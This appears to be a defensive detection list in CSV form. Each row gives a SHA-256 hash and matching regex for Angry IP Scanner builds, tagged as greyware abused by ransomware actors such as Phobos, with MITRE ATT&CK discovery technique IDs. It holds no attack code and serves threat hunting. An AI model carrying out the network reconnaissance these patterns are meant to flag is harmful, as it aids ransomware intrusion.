"*b9723ac6913ec711c25f35ae45869af57f3868b690a8da331ccbedfcd37ca68f*",".{0,1000}b9723ac6913ec711c25f35ae45869af57f3868b690a8da331ccbedfcd37ca68f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b9e13383878ef7999d46b18b41d6699ce5c406af071ec849235bdd103025e3e5*",".{0,1000}b9e13383878ef7999d46b18b41d6699ce5c406af071ec849235bdd103025e3e5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ba8bf4dcb9e12c6a4abc64205fe7e07ddf0610db4a6c536a550125d597add25b*",".{0,1000}ba8bf4dcb9e12c6a4abc64205fe7e07ddf0610db4a6c536a550125d597add25b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*bb1ce1e7d92f6ac0da1bd1b8cee56d6139b9dc41f5821e58e7d07063805e7b3f*",".{0,1000}bb1ce1e7d92f6ac0da1bd1b8cee56d6139b9dc41f5821e58e7d07063805e7b3f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*bc75191718b8556c1c8610987285d98f7421044d7be117252d5f35516af3205c*",".{0,1000}bc75191718b8556c1c8610987285d98f7421044d7be117252d5f35516af3205c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*bc7ee01c3d261a0c0a63e250513aa2eb28d7f707570c8fb507742fb125c5da07*",".{0,1000}bc7ee01c3d261a0c0a63e250513aa2eb28d7f707570c8fb507742fb125c5da07.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*bc811e6d2c2df7fd2826ba0545a5a27f53d6da1420abfb8ff5ff8e0427a9317d*",".{0,1000}bc811e6d2c2df7fd2826ba0545a5a27f53d6da1420abfb8ff5ff8e0427a9317d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*bca3eca534819386df33cde502bcbb23224dc2f814979ca580be4ff2d4c80067*",".{0,1000}bca3eca534819386df33cde502bcbb23224dc2f814979ca580be4ff2d4c80067.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*bcbae8d4564f1c0933331c5e4c5b779a72d889504155e209e2aa942b963160b2*",".{0,1000}bcbae8d4564f1c0933331c5e4c5b779a72d889504155e209e2aa942b963160b2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c049a837cfa5f098e27fbbe5904daa2cf3d21e6ad51b662b2ecc723c3abf6c6a*",".{0,1000}c049a837cfa5f098e27fbbe5904daa2cf3d21e6ad51b662b2ecc723c3abf6c6a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c08c98dcc7973d70b4024299db6c96acb6ba060749af54da45724b6427d0d897*",".{0,1000}c08c98dcc7973d70b4024299db6c96acb6ba060749af54da45724b6427d0d897.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c0f307cdba8e36664c10d7d7969bbd2d0e670503f33ae8b2ed693ede0f12f5b9*",".{0,1000}c0f307cdba8e36664c10d7d7969bbd2d0e670503f33ae8b2ed693ede0f12f5b9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c36fe320b5868ebb899a79c09b3c7de43c887e00ad63ed34df6c47cd8fdb2919*",".{0,1000}c36fe320b5868ebb899a79c09b3c7de43c887e00ad63ed34df6c47cd8fdb2919.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c3c3c9668033f2f2b272b6003bf9ecb9d0ba77a04f5dc0fe79a1d4b7a1f31366*",".{0,1000}c3c3c9668033f2f2b272b6003bf9ecb9d0ba77a04f5dc0fe79a1d4b7a1f31366.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c4776bfa13df65546ba20938f68214281a2d1771ff0d5e89542e28d34c54933e*",".{0,1000}c4776bfa13df65546ba20938f68214281a2d1771ff0d5e89542e28d34c54933e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c5063df64bd9604d8cdc0d20d4a1eb2340425cf7a38e126fbe45f3e210a1b6a8*",".{0,1000}c5063df64bd9604d8cdc0d20d4a1eb2340425cf7a38e126fbe45f3e210a1b6a8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c6c3d2c485f517a417ed0303ec5af3888dcd3f31a90f7c0d959f01f4a540d61a*",".{0,1000}c6c3d2c485f517a417ed0303ec5af3888dcd3f31a90f7c0d959f01f4a540d61a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c7304d8f23a7d129d30e27955a020357518164d01e60eb17b0db2768ceed435e*",".{0,1000}c7304d8f23a7d129d30e27955a020357518164d01e60eb17b0db2768ceed435e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c7e26e0a8bbe91d86c363956c9d5d4d32b55f195c9a4970cfad4df2a07853013*",".{0,1000}c7e26e0a8bbe91d86c363956c9d5d4d32b55f195c9a4970cfad4df2a07853013.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*c8a45f4e2b59642d67abcd63f8c764b3b8fa2713bdbb1278aae427cb31cde4e0*",".{0,1000}c8a45f4e2b59642d67abcd63f8c764b3b8fa2713bdbb1278aae427cb31cde4e0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ca08f69443eb20365de2172255cc51e6be69ed93ef5edb79d870952fd68b500d*",".{0,1000}ca08f69443eb20365de2172255cc51e6be69ed93ef5edb79d870952fd68b500d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*caae7a70d2fe9e94e7870ec50278b0c4a115e7ffd6c87e7c729462019f973024*",".{0,1000}caae7a70d2fe9e94e7870ec50278b0c4a115e7ffd6c87e7c729462019f973024.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cabc5f4b4dee64623a9a8493bad6c1fc6db5216caa5c904f78cc82d1d25645b7*",".{0,1000}cabc5f4b4dee64623a9a8493bad6c1fc6db5216caa5c904f78cc82d1d25645b7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cac1286a56b2de1195d3b79ed029e68f827a1d4e8da914097dfce64584e407d0*",".{0,1000}cac1286a56b2de1195d3b79ed029e68f827a1d4e8da914097dfce64584e407d0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cb5c6641c926bbcde9dc6306f2049aafa148ce393b974f2b7a0d7e0eafa811f7*",".{0,1000}cb5c6641c926bbcde9dc6306f2049aafa148ce393b974f2b7a0d7e0eafa811f7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cba592d413d8cb3d09989b0b7693f3247517590d2e83329d4ae5f5b407fffc23*",".{0,1000}cba592d413d8cb3d09989b0b7693f3247517590d2e83329d4ae5f5b407fffc23.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cc352c90f7f771ad36e224e1b3357be8da3d698f8ef3edc2ac4999dd843a5071*",".{0,1000}cc352c90f7f771ad36e224e1b3357be8da3d698f8ef3edc2ac4999dd843a5071.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cc5f8c886d8fccf6571caa4954c7ec3e5ded2e8de3c06da6695c8ea755021cd4*",".{0,1000}cc5f8c886d8fccf6571caa4954c7ec3e5ded2e8de3c06da6695c8ea755021cd4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ccdbf9ce861c5032c54faa19c8addfb6a113acfc595851a4e3305d946f2abef5*",".{0,1000}ccdbf9ce861c5032c54faa19c8addfb6a113acfc595851a4e3305d946f2abef5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ccdf8f148f9d2245383d69a5d9c7d4a5595c2c7c31416927ebda1e3bc1d33941*",".{0,1000}ccdf8f148f9d2245383d69a5d9c7d4a5595c2c7c31416927ebda1e3bc1d33941.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cd8c433651e8c1f9442c29ef575704a9a81168dd38e56ba882c02d1aa372c545*",".{0,1000}cd8c433651e8c1f9442c29ef575704a9a81168dd38e56ba882c02d1aa372c545.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cdd530f38141348a294c13eec996195e8882d00d2ffb2b0ec89f58508fc3634d*",".{0,1000}cdd530f38141348a294c13eec996195e8882d00d2ffb2b0ec89f58508fc3634d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cf700fa504e99bf418029192fdfe571eb19338f2a9053bb81ca082c714cf59d5*",".{0,1000}cf700fa504e99bf418029192fdfe571eb19338f2a9053bb81ca082c714cf59d5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*cf89753f97f44100d17ddac620231af952e70cb3f4fc02f410d3573be06b332e*",".{0,1000}cf89753f97f44100d17ddac620231af952e70cb3f4fc02f410d3573be06b332e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d1a9af4f13225a46916c1d71c7645098a589ee5f9270aa018c915153c076b76f*",".{0,1000}d1a9af4f13225a46916c1d71c7645098a589ee5f9270aa018c915153c076b76f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d21feb81faa65f44ab7c0c4c77d8e2fb012168ccec13b6b3aa63662812e14023*",".{0,1000}d21feb81faa65f44ab7c0c4c77d8e2fb012168ccec13b6b3aa63662812e14023.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d252cafb581626c5cdf72411d66eab796336cb02f4813b11ac34f628a603e482*",".{0,1000}d252cafb581626c5cdf72411d66eab796336cb02f4813b11ac34f628a603e482.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d2ec114cf44c9e15b158efd61850595daa1bc199732cb017d32abc19d66d4f9e*",".{0,1000}d2ec114cf44c9e15b158efd61850595daa1bc199732cb017d32abc19d66d4f9e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d3ae15d4a9cc5c19e380cea606bc247b3765f93928dd7ae2d03e1f0a4f623db9*",".{0,1000}d3ae15d4a9cc5c19e380cea606bc247b3765f93928dd7ae2d03e1f0a4f623db9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d3fc4d5bc4e176a51422c1cc9fc882b6ee646b0aa57dbb59feb42fa3c85783e8*",".{0,1000}d3fc4d5bc4e176a51422c1cc9fc882b6ee646b0aa57dbb59feb42fa3c85783e8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d4016a747a083cd6a02f81fc980adf7b318c625a00227ef9a216706318800165*",".{0,1000}d4016a747a083cd6a02f81fc980adf7b318c625a00227ef9a216706318800165.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d5c8fbea45f7ce94a5c4753e733ef530aae702a90eb67d7ac00faa8a9e8e9024*",".{0,1000}d5c8fbea45f7ce94a5c4753e733ef530aae702a90eb67d7ac00faa8a9e8e9024.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d6430b77260fe3cd4fde6422317cbf232f7af5e29bd81267d10f48b01afec850*",".{0,1000}d6430b77260fe3cd4fde6422317cbf232f7af5e29bd81267d10f48b01afec850.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d6d55eb0eabd43a50f6de2f77b7b67e2136578e8d5ab0dfbbefe21bda3937e91*",".{0,1000}d6d55eb0eabd43a50f6de2f77b7b67e2136578e8d5ab0dfbbefe21bda3937e91.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*d8aa3176d3cdb0deede2becaa1c383db0c78404f829c2dd06de86736fde68a09*",".{0,1000}d8aa3176d3cdb0deede2becaa1c383db0c78404f829c2dd06de86736fde68a09.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*dbe98c8b66436859514f07786c6903ca2805083615201adc1d1d63d1fa66d14b*",".{0,1000}dbe98c8b66436859514f07786c6903ca2805083615201adc1d1d63d1fa66d14b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*dc1c0ca64990cbd3f509f404f6cdef395895bed206de7d320052267586bdf416*",".{0,1000}dc1c0ca64990cbd3f509f404f6cdef395895bed206de7d320052267586bdf416.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*dce52871edb60f241f17fc6a43f236ab53b4b42813c1af0de929ec261eca2637*",".{0,1000}dce52871edb60f241f17fc6a43f236ab53b4b42813c1af0de929ec261eca2637.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*df2bca8190a27477227f92a6825dce00fda7e2f5c2a2a3da67638b016ff62502*",".{0,1000}df2bca8190a27477227f92a6825dce00fda7e2f5c2a2a3da67638b016ff62502.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*df331b6bcc463f2caae8c4d892f473e2a4a37a8970cc8e38a776735d6feaa140*",".{0,1000}df331b6bcc463f2caae8c4d892f473e2a4a37a8970cc8e38a776735d6feaa140.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*dfb3aea9e6fe5eccecfaf6e280416d9c93b0b2d89a0094cb83e19002197c851b*",".{0,1000}dfb3aea9e6fe5eccecfaf6e280416d9c93b0b2d89a0094cb83e19002197c851b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*dfca25f7d51972cf38fe3340b8e9967c67532d5bc6d776c0284b741433c94184*",".{0,1000}dfca25f7d51972cf38fe3340b8e9967c67532d5bc6d776c0284b741433c94184.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e1c6aea6094d317f351d9260fd6ea1a148f8a102c919c7067e2d39cd1016a8f7*",".{0,1000}e1c6aea6094d317f351d9260fd6ea1a148f8a102c919c7067e2d39cd1016a8f7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e1e0d3e30646550711722e8794192b05aa51adea9e4e02941ac19e67fbbc4c0f*",".{0,1000}e1e0d3e30646550711722e8794192b05aa51adea9e4e02941ac19e67fbbc4c0f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e31519c2fa99c4739269b273268b45293a7f02b98a71426028cb37d4ffad95ca*",".{0,1000}e31519c2fa99c4739269b273268b45293a7f02b98a71426028cb37d4ffad95ca.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e37228d7dc5e4766d9070bca5f0d616ae04887d7f6ee7b30cc8ea5a0190c7441*",".{0,1000}e37228d7dc5e4766d9070bca5f0d616ae04887d7f6ee7b30cc8ea5a0190c7441.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e58805777cadba322e4e1b6a15969b34fbeddd0e473fe043f6fb976e71652b27*",".{0,1000}e58805777cadba322e4e1b6a15969b34fbeddd0e473fe043f6fb976e71652b27.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
